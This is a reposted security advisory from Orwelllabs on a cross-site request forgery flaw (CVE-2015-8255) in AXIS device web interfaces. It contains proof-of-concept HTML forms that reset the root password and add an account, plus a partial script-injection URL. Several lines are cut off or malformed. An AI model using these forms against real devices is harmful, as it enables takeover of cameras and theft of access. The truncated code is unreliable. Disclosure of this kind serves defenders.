Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017030163

Below is a copy:

AXIS Communications Cross Site Request Forgery          0RWELLL4BS
       security advisory
         PGP: 79A6CCC0

Advisory Information
- Title: Cross-Site Request Forgery
- Vendor: AXIS Communications
- Research and Advisory: Orwelllabs
- Class: Session Management control [CWE-352]
- CVE Name: CVE-2015-8255
- Affected Versions:
- IoT Attack Surface: Device Web Interface
- OWASP IoTTop10: I1

Technical Details
Because of the own (bad) design of this kind of device (Actualy a big
problem of IoT, one of them)
The embedded web application does not verify whether a valid request was
intentionally provided by the user who submitted the request.

#-> Setting root password to W!nst0n

  <!-- CSRF PoC  Orwelllabs -->
    <form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="user" value="root" />
      <input type="hidden" name="pwd" value="w!nst0n" />
      <input type="hidden" name="comment" value="Administrator" />
      <input type="submit" value="Submit request" />

#-> Adding new credential SmithW:W!nst0n

  <!-- CSRF PoC - Orwelllabs -->
    <form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="user" value="SmithW" />
      <input type="hidden" name="sgrp"
      <input type="hidden" name="pwd" value="W!nst0n" />
      <input type="hidden" name="grp" value="users" />
      <input type="hidden" name="comment" value="WebUser" />
      <input type="submit" value="Submit request" />

#-> Deleting an app via directly CSRF (axis_update.shtml)

http://xxx.xxx.xxx.xxx/axis-cgi/vaconfig.cgi?action=get&name=<script src="

[And many acitions allowed to an user [all of them?] can be forged in this

Vendor Information, Solutions and Workarounds
Well, this is a very old design problem of this kind of device, nothing new
to say about that.

These vulnerabilities has been discovered and published by Orwelllabs.

Legal Notices
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this

About Orwelllabs

Copyright ©2017 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.